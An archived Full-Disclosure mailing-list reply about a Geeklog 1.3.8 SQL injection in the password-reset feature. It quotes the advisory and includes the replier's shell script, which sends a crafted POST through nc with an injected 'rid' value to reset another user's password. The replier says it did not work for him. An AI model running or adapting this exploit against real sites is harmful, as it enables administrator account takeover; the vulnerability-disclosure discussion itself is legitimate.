[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Geeklog exploit

To: <full-disclosure@lists.netsys.com>
Subject: Re: [Full-Disclosure] Geeklog exploit
From: Thomas Rogg <thomas@outcast-media.com>
Date: Sun, 19 Oct 2003 20:15:15 +0200

am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter jouko@iki.fi:


> ...
> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because an SQL injection problem. In users.php we have
> this kind of code (line about 750):
> ...

I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] Geeklog exploit
  - From: Jouko Pynnonen <jouko@iki.fi>

Prev by Date: [Full-Disclosure] Vulneraibilty Asesment report in NASA.GOV Websites [not finished , only news]
Next by Date: Re: [Full-Disclosure] Foundstone Labs to Release Absolutely FREE Tool
Previous by thread: [Full-Disclosure] Geeklog exploit
Next by thread: [Full-Disclosure] Bugtraq?
Index(es):
- Date
- Thread